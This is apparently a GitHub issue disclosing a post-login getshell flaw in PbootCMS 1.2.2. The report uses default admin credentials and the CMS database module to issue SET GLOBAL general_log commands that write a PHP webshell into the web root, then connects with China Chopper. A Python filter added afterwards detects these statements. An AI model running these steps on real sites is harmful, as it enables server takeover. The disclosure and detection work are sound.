Pbootcms1.2.2 background execution sql statement getshell vulnerability, database management module + mysql GLOBAL general_log #2

Open
myzing00 opened this issue Nov 6, 2018 · 0 comments

myzing00 commented Nov 6, 2018

There is a getshell vulnerability here: the integrated database management module executes SQL statements, combined with the MySQL GLOBAL general_log function. PbootCMS version 1.2.2.
1. The default database is SQLite. For testing convenience, we need to replace the default database with the MySQL database.
The MySQL database directory:
Pbootcms\static\backup\sql\20180720164810_pbootcms.sql

2. Open http://127.0.0.1/PbootCMS/admin.php in the browser and enter the account and password to enter the background.
username=admin
password=123456

http://127.0.0.1/PbootCMS/admin.php/Site/server can be used to get the absolute path of the server:
E:/Pentest_tool/phpStudy/PHPTutorial/WWW/PbootCMS/

Database management module
http://127.0.0.1/PbootCMS/admin.php/Database/index
Here you can enter any SQL statement.

Use mysql GLOBAL general_log write webshell

1. SET GLOBAL general_log = 'On';

2. Set the log file path
SET GLOBAL general_log_file = 'E:\Pentest_tool\phpStudy\PHPTutorial\WWW\PbootCMS\1.php';

3. Enter a select statement with a sentence webshell
select ;
The webshell has been written to the log file 1.php.
Connect to the webshell using China Chopper.

PS: Cannot write a webshell via export file, because MySQL defaults to secure-file-priv.
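A detection-side counterpart, added here as an example and not part of the original report: a filter that flags SQL statements (from a query audit log or the admin panel's request log) which switch on `general_log` or point `general_log_file` at a script file or into the web root. The web root is the one from the report's test machine; the extension list, function names and sample statements are assumptions constructed for this example.

```python
import posixpath
import re

# Assumptions: the web root is the one shown in the report's test setup, and the
# extension list covers what the web server would execute. Adjust both per host.
WEB_ROOTS = ["E:/Pentest_tool/phpStudy/PHPTutorial/WWW"]
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".phar", ".asp", ".aspx", ".jsp"}

# Matches SET GLOBAL general_log[_file] = <quoted string | bare word>.
SET_RE = re.compile(
    r"\bSET\s+(?:GLOBAL\s+|@@GLOBAL\.)(general_log(?:_file)?)\s*=\s*"
    r"(?:'([^']*)'|\"([^\"]*)\"|(\w+))",
    re.IGNORECASE,
)

def normalize(path):
    """Fold Windows/Unix spellings of a path into one comparable form."""
    path = re.sub(r"/+", "/", path.replace("\\", "/")).lower()
    return path.rstrip(" .")  # Windows drops trailing dots and spaces

def inspect(statement):
    """Return a list of findings for one SQL statement (empty if clean)."""
    findings = []
    for m in SET_RE.finditer(statement):
        var = m.group(1).lower()
        value = next(g for g in m.groups()[1:] if g is not None)
        if var == "general_log":
            if value.lower() in ("on", "1", "true"):
                findings.append("general_log enabled at runtime")
            continue
        path = normalize(value)
        if posixpath.splitext(path)[1] in SCRIPT_EXTS:
            findings.append("general_log_file has a script extension")
        roots = [normalize(r) + "/" for r in WEB_ROOTS]
        if any(path.startswith(r) for r in roots):
            findings.append("general_log_file is under the web root")
    return findings

# Constructed sample input: statements as an audit log might record them.
SAMPLES = [
    "SET GLOBAL general_log = 'On';",
    r"SET GLOBAL general_log_file = 'E:\Pentest_tool\phpStudy\PHPTutorial\WWW\PbootCMS\1.php';",
    "set global general_log_file = '/var/log/mysql/general.log';",
    "SELECT id, title FROM articles;",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(inspect(s) or "ok", "<-", s)
```

Both `SET GLOBAL` statements require an administrative MySQL privilege (SUPER, or SYSTEM_VARIABLES_ADMIN on MySQL 8), so connecting the CMS with an account that lacks it makes them fail outright.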
